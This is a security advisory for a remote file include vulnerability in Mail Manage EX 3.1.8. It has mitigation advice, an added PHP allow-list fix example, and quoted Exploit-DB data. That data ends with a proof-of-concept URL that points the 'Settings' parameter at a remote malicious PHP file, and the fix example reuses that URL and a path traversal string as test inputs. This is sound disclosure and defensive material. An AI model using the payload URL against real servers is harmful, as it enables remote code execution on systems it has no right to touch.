vendor: Mail Manage EX
by:
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: Mail Manage EX
Affected Version From: Mail Manage EX 3.1.8
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Mail Manage EX Remote File Include Vulnerability

The Mail Manage EX application is prone to a remote file include vulnerability. This vulnerability occurs due to insufficient sanitization of user-supplied data. A remote attacker can exploit this issue by including arbitrary PHP files located on remote servers.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied data before using it in file inclusion operations. Additionally, restricting access to remote servers and implementing strong input validation can help prevent such attacks.
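
One way to apply the mitigation above, as an added example that is not Mail Manage EX code or part of the original advisory: the request value is treated as a key into a fixed allow-list rather than as a path. The function name, directory and profile names are hypothetical, and the include shown in the comment is an assumed shape based on the advisory's description.

```php
<?php
// Added illustration, not Mail Manage EX source. resolve_settings_file(),
// SETTINGS_DIR and the profile names are hypothetical.
//
// Assumed shape of the flaw the advisory describes (comment only):
//   include($_GET['Settings']);   // request value reaches include() unchecked

const SETTINGS_DIR = __DIR__ . '/config';

// The request may only name one of these keys; file names are fixed here.
const SETTINGS_ALLOWLIST = [
    'default' => 'settings.default.php',
    'archive' => 'settings.archive.php',
];

function resolve_settings_file($requested): string
{
    // Non-strings (?Settings[]=x) and unknown keys are rejected, so URLs,
    // stream wrappers and traversal strings never reach the filesystem.
    if (!is_string($requested) || !array_key_exists($requested, SETTINGS_ALLOWLIST)) {
        throw new InvalidArgumentException('unknown settings profile');
    }

    // Defence in depth: the resolved file must exist inside SETTINGS_DIR.
    $base = realpath(SETTINGS_DIR);
    $path = realpath(SETTINGS_DIR . '/' . SETTINGS_ALLOWLIST[$requested]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('settings file missing or outside config directory');
    }
    return $path;
}

// Constructed inputs: a valid key, the URL form from the advisory, a traversal
// string. 'default' is also rejected if ./config/settings.default.php is absent.
foreach (['default', 'http://www.example.com/malicious.php', '../../etc/passwd'] as $input) {
    try {
        echo $input, ' => ', resolve_settings_file($input), PHP_EOL;
    } catch (Exception $e) {
        echo $input, ' => rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

In the application the call site becomes `require resolve_settings_file($_GET['Settings'] ?? 'default');`. Setting `allow_url_include = Off` in php.ini adds an interpreter-level block on URL includes that does not depend on application code.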

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10457/info

Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP files located on remote servers.

This issue was discovered in Mail Manage EX 3.1.8. It is possible that previous versions are affected as well. 

http://www.example.com/mail/mmex.php?Settings=http://www.example.com/malicious.php